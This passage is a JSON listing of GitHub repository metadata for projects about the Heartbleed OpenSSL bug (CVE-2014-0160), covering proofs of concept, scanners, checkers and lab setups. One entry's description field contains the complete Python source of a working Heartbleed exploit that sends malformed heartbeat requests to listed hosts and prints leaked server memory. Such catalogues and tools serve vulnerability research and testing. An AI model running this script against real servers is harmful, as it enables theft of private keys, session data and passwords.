"name": "heartbleed-PoC",
"full_name": "mpgn\/heartbleed-PoC",
"owner": {
"login": "mpgn",
"id": 5891788,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4",
"html_url": "https:\/\/github.com\/mpgn",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/mpgn\/heartbleed-PoC",
"description": ":broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:",
"fork": false,
"created_at": "2015-03-08T19:54:33Z",
"updated_at": "2025-01-14T11:03:40Z",
"pushed_at": "2021-02-20T19:41:03Z",
"stargazers_count": 82,
"watchers_count": 82,
"has_discussions": false,
"forks_count": 42,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 42,
"watchers": 82,
"score": 0,
"subscribers_count": 6
},
{
"id": 33456758,
"name": "heartbleed.py",
"full_name": "xanas\/heartbleed.py",
"owner": {
"login": "xanas",
"id": 11810462,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11810462?v=4",
"html_url": "https:\/\/github.com\/xanas",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/xanas\/heartbleed.py",
"description": "#!\/usr\/bin\/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP\/POP\/IMAP\/FTP\/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS\/STLS\/AUTH TLS is supported when smtp\/pop\/imap\/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect\/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action=\"store_true\", dest=\"starttls\", help='Issue STARTTLS command for SMTP\/POP\/IMAP\/FTP\/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) \t#print ' %04x: %-48s %s' % (b, hxdat, pdat) \tpdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print \"Error receiving data: \", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp\/pop3\/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls\/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send(\"EHLO someone.org\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if pop3\/imap supports starttls\/stls elif port in {110, 143}: print 'POP3\/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send(\"CAPA\\n\") if port == 143: s.send(\"CAPABILITY\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if ftp supports auth tls\/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send(\"FEAT\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"AUTH TLS\" in check: opts.starttls = True atls = True print \"AUTH TLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send(\"STLS\\n\") elif atls: print 'Sending AUTH TLS Command...' s.send(\"AUTH TLS\\n\") else: print 'Sending STARTTLS Command...' s.send(\"STARTTLS\\n\") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print \"Error connecting to host: \", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, \"r\") for line in fileIN: targetinfo = line.strip().split(\":\") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()",
"fork": false,
"created_at": "2015-04-05T22:03:30Z",
"updated_at": "2020-05-28T14:44:33Z",
"pushed_at": "2015-04-05T22:03:31Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 35284258,
"name": "heartbleed",
"full_name": "iSCInc\/heartbleed",
"owner": {
"login": "iSCInc",
"id": 6920447,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6920447?v=4",
"html_url": "https:\/\/github.com\/iSCInc",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/iSCInc\/heartbleed",
"description": "A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..",
"fork": false,
"created_at": "2015-05-08T14:37:44Z",
"updated_at": "2015-05-15T13:19:04Z",
"pushed_at": "2015-05-15T13:20:41Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 37109043,
"name": "cve-2014-0160-Yunfeng-Jiang",
"full_name": "marstornado\/cve-2014-0160-Yunfeng-Jiang",
"owner": {
"login": "marstornado",
"id": 1574834,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1574834?v=4",
"html_url": "https:\/\/github.com\/marstornado",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/marstornado\/cve-2014-0160-Yunfeng-Jiang",
"description": null,
"fork": false,
"created_at": "2015-06-09T03:55:14Z",
"updated_at": "2015-06-09T04:03:10Z",
"pushed_at": "2015-06-09T04:14:11Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 38980774,
"name": "vaas-cve-2014-0160",
"full_name": "hmlio\/vaas-cve-2014-0160",
"owner": {
"login": "hmlio",
"id": 11684719,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11684719?v=4",
"html_url": "https:\/\/github.com\/hmlio",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-0160",
"description": "Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed",
"fork": false,
"created_at": "2015-07-12T22:40:54Z",
"updated_at": "2024-07-14T13:03:17Z",
"pushed_at": "2019-10-08T10:03:04Z",
"stargazers_count": 15,
"watchers_count": 15,
"has_discussions": false,
"forks_count": 8,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 8,
"watchers": 15,
"score": 0,
"subscribers_count": 2
},
{
"id": 43054972,
"name": "heartbleedscanner",
"full_name": "hybridus\/heartbleedscanner",
"owner": {
"login": "hybridus",
"id": 5206389,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5206389?v=4",
"html_url": "https:\/\/github.com\/hybridus",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/hybridus\/heartbleedscanner",
"description": "Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) ",
"fork": false,
"created_at": "2015-09-24T08:39:28Z",
"updated_at": "2024-08-12T19:19:25Z",
"pushed_at": "2015-09-24T16:15:11Z",
"stargazers_count": 11,
"watchers_count": 11,
"has_discussions": false,
"forks_count": 11,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 11,
"watchers": 11,
"score": 0,
"subscribers_count": 3
},
{
"id": 44786613,
"name": "Heartbleed_Dockerfile_with_Nginx",
"full_name": "froyo75\/Heartbleed_Dockerfile_with_Nginx",
"owner": {
"login": "froyo75",
"id": 8553697,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8553697?v=4",
"html_url": "https:\/\/github.com\/froyo75",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/froyo75\/Heartbleed_Dockerfile_with_Nginx",
"description": "Dockerfile for testing CVE-2014-0160 Heartbleed exploitation.",
"fork": false,
"created_at": "2015-10-23T02:42:30Z",
"updated_at": "2023-03-13T22:49:12Z",
"pushed_at": "2021-08-28T22:10:26Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 51847934,
"name": "CVE-2014-0160-Chrome-Plugin",
"full_name": "Xyl2k\/CVE-2014-0160-Chrome-Plugin",
"owner": {
"login": "Xyl2k",
"id": 8536299,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8536299?v=4",
"html_url": "https:\/\/github.com\/Xyl2k",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/Xyl2k\/CVE-2014-0160-Chrome-Plugin",
"description": "Heartbleed",
"fork": false,
"created_at": "2016-02-16T15:49:55Z",
"updated_at": "2021-06-17T17:01:26Z",
"pushed_at": "2016-02-16T16:04:33Z",
"stargazers_count": 1,
"watchers_count": 1,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 1,
"score": 0,
"subscribers_count": 3
},
{
"id": 156641077,
"name": "OpenSSL-HeartBleed-CVE-2014-0160-PoC",
"full_name": "caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC",
"owner": {
"login": "caiqiqi",
"id": 8278315,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8278315?v=4",
"html_url": "https:\/\/github.com\/caiqiqi",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC",
"description": "来自https:\/\/www.freebuf.com\/articles\/web\/31700.html",
"fork": false,
"created_at": "2018-11-08T02:50:28Z",
"updated_at": "2018-11-08T02:51:58Z",
"pushed_at": "2018-11-08T02:51:56Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 4,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 4,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 161246011,
"name": "HeartBleed",
"full_name": "Saymeis\/HeartBleed",
"owner": {
"login": "Saymeis",
"id": 42687972,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42687972?v=4",
"html_url": "https:\/\/github.com\/Saymeis",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/Saymeis\/HeartBleed",
"description": "CVE-2014-0160",
"fork": false,
"created_at": "2018-12-10T22:42:51Z",
"updated_at": "2019-07-31T23:10:49Z",
"pushed_at": "2019-05-19T15:13:33Z",
"stargazers_count": 1,
"watchers_count": 1,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 1,
"score": 0,
"subscribers_count": 0
},
{
"id": 164344882,
"name": "cve-2014-0160",
"full_name": "cved-sources\/cve-2014-0160",
"owner": {
"login": "cved-sources",
"id": 46423677,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4",
"html_url": "https:\/\/github.com\/cved-sources",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/cved-sources\/cve-2014-0160",
"description": "cve-2014-0160",
"fork": false,
"created_at": "2019-01-06T20:57:53Z",
"updated_at": "2021-04-15T21:08:31Z",
"pushed_at": "2021-04-15T20:57:26Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 2,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 2,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 172987767,
"name": "heartbleed",
"full_name": "cheese-hub\/heartbleed",
"owner": {
"login": "cheese-hub",
"id": 41589726,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41589726?v=4",
"html_url": "https:\/\/github.com\/cheese-hub",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/cheese-hub\/heartbleed",
"description": "Demonstration of the Heartbleed Bug CVE-2014-0160",
"fork": false,
"created_at": "2019-02-27T20:46:41Z",
"updated_at": "2024-11-03T03:56:30Z",
"pushed_at": "2019-06-27T13:00:11Z",
"stargazers_count": 1,
"watchers_count": 1,
"has_discussions": false,
"forks_count": 3,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 3,
"watchers": 1,
"score": 0,
"subscribers_count": 4
},
{
"id": 179123466,
"name": "cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
"full_name": "artofscripting-zz\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
"owner": {
"login": "artofscripting-zz",
"id": 1545672,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1545672?v=4",
"html_url": "https:\/\/github.com\/artofscripting-zz",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/artofscripting-zz\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
"description": null,
"fork": false,
"created_at": "2019-04-02T17:08:01Z",
"updated_at": "2019-04-02T18:11:08Z",
"pushed_at": "2019-04-02T18:11:07Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 179373566,
"name": "heartbleed-bug",
"full_name": "cldme\/heartbleed-bug",
"owner": {
"login": "cldme",
"id": 10621824,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10621824?v=4",
"html_url": "https:\/\/github.com\/cldme",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/cldme\/heartbleed-bug",
"description": "Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔",
"fork": false,
"created_at": "2019-04-03T21:32:50Z",
"updated_at": "2019-04-10T16:42:44Z",
"pushed_at": "2019-04-10T16:42:43Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 200631397,
"name": "Heartexploit",
"full_name": "ThanHuuTuan\/Heartexploit",
"owner": {
"login": "ThanHuuTuan",
"id": 32167814,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32167814?v=4",
"html_url": "https:\/\/github.com\/ThanHuuTuan",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/ThanHuuTuan\/Heartexploit",
"description": "Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.",
"fork": false,
"created_at": "2019-08-05T10:09:44Z",
"updated_at": "2020-08-22T02:07:50Z",
"pushed_at": "2018-05-07T19:11:20Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 277099398,
"name": "heartbleed",
"full_name": "rouze-d\/heartbleed",
"owner": {
"login": "rouze-d",
"id": 50823809,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50823809?v=4",
"html_url": "https:\/\/github.com\/rouze-d",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/rouze-d\/heartbleed",
"description": "Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL\/TLS versions)",
"fork": false,
"created_at": "2020-07-04T11:46:51Z",
"updated_at": "2020-07-04T12:12:06Z",
"pushed_at": "2020-07-04T12:12:04Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 319993085,
"name": "CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed",
"full_name": "WildfootW\/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed",
"owner": {
"login": "WildfootW",
"id": 11520473,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11520473?v=4",
"html_url": "https:\/\/github.com\/WildfootW",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/WildfootW\/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed",
"description": null,
"fork": false,
"created_at": "2020-12-09T15:08:21Z",
"updated_at": "2020-12-09T15:08:56Z",
"pushed_at": "2020-12-09T15:08:53Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 321147840,
"name": "heartbleed",
"full_name": "GuillermoEscobero\/heartbleed",
"owner": {
"login": "GuillermoEscobero",
"id": 15904345,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15904345?v=4",
"html_url": "https:\/\/github.com\/GuillermoEscobero",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/GuillermoEscobero\/heartbleed",
"description": "CVE-2014-0160 OpenSSL Heartbleed Proof of Concept",
"fork": false,
"created_at": "2020-12-13T19:53:50Z",
"updated_at": "2021-11-08T14:48:58Z",
"pushed_at": "2020-12-14T19:15:20Z",
"stargazers_count": 2,
"watchers_count": 2,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 2,
"score": 0,
"subscribers_count": 2
},
{
"id": 325974459,
"name": "A2SV--SSL-VUL-Scan",
"full_name": "anthophilee\/A2SV--SSL-VUL-Scan",
"owner": {
"login": "anthophilee",
"id": 75995332,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4",
"html_url": "https:\/\/github.com\/anthophilee",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/anthophilee\/A2SV--SSL-VUL-Scan",
"description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device",
"fork": false,
"created_at": "2021-01-01T12:26:08Z",
"updated_at": "2025-01-04T11:54:28Z",
"pushed_at": "2021-01-01T12:26:10Z",
"stargazers_count": 4,
"watchers_count": 4,
"has_discussions": false,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 4,
"score": 0,
"subscribers_count": 1
},
{
"id": 338782923,
"name": "heartpatch.us",
"full_name": "ingochris\/heartpatch.us",
"owner": {
"login": "ingochris",
"id": 2686679,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2686679?v=4",
"html_url": "https:\/\/github.com\/ingochris",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/ingochris\/heartpatch.us",
"description": "OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo.",
"fork": false,
"created_at": "2021-02-14T10:48:56Z",
"updated_at": "2021-04-21T17:06:57Z",
"pushed_at": "2021-02-14T13:34:18Z",
"stargazers_count": 3,
"watchers_count": 3,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [
"detection",
"exploit",
"heartbleed",
"patch"
],
"visibility": "public",
"forks": 0,
"watchers": 3,
"score": 0,
"subscribers_count": 1
},
{
"id": 353005718,
"name": "heartbleed",
"full_name": "belmind\/heartbleed",
"owner": {
"login": "belmind",
"id": 22224799,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22224799?v=4",
"html_url": "https:\/\/github.com\/belmind",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/belmind\/heartbleed",
"description": "A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸",
"fork": false,
"created_at": "2021-03-30T13:11:26Z",
"updated_at": "2022-05-26T08:11:24Z",
"pushed_at": "2021-05-20T13:28:44Z",
"stargazers_count": 2,
"watchers_count": 2,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [
"heartbleed"
],
"visibility": "public",
"forks": 0,
"watchers": 2,
"score": 0,
"subscribers_count": 2
},
{
"id": 396322717,
"name": "bleeding-heart",
"full_name": "pierceoneill\/bleeding-heart",
"owner": {
"login": "pierceoneill",
"id": 37594104,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37594104?v=4",
"html_url": "https:\/\/github.com\/pierceoneill",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/pierceoneill\/bleeding-heart",
"description": "The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL\/TLS to keep the connection alive.",
"fork": false,
"created_at": "2021-08-15T11:05:23Z",
"updated_at": "2021-08-15T11:13:05Z",
"pushed_at": "2021-08-15T11:13:02Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 2
},
{
"id": 485013657,
"name": "CVE-2014-0160_Heartbleed",
"full_name": "n3rdh4x0r\/CVE-2014-0160_Heartbleed",
"owner": {
"login": "n3rdh4x0r",
"id": 66146701,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4",
"html_url": "https:\/\/github.com\/n3rdh4x0r",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2014-0160_Heartbleed",
"description": null,
"fork": false,
"created_at": "2022-04-24T11:53:16Z",
"updated_at": "2022-10-25T16:16:14Z",
"pushed_at": "2022-04-24T11:54:23Z",
"stargazers_count": 0,
"watchers_count": 0,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0,
"subscribers_count": 1
},
{
"id": 489531253,
"name": "fuzzing",
"full_name": "GardeniaWhite\/fuzzing",
"owner": {
"login": "GardeniaWhite",
"id": 50975594,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50975594?v=4",
"html_url": "https:\/\/github.com\/GardeniaWhite",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/GardeniaWhite\/fuzzing",
"description": "fuzzing with libFuzzerinlude openssl heartbleed (CVE-2014-0160)",
"fork": false,
"created_at": "2022-05-07T00:52:46Z",
"updated_at": "2024-07-25T07:48:10Z",
"pushed_at": "2022-05-07T05:51:40Z",
"stargazers_count": 2,
"watchers_count": 2,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"web_commit_signoff_required": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 2,
"score": 0,
"subscribers_count": 1
},
{
"id": 585686482,
"name": "heartbleed-proof-of-concept",
"full_name": "undacmic\/heartbleed-proof-of-concept",
"owner": {
"login": "undacmic",
"id": 46650582,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46650582?v=4",
"html_url": "https:\/\/github.com\/undacmic",
"user_view_type": "public"
},
"html_url": "https:\/\/github.com\/undacmic\/heartbleed-proof-of-concept",
"description": "Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock:",
"fork": false,
"created_at": "2023-01-05T20:09:38Z",
"updated_at": "2024-12-22T15:13:45Z",
"pushed_at": "2023-01-18T20:36:53Z",
"stargazers_count": 5,
"watchers_count": 5,
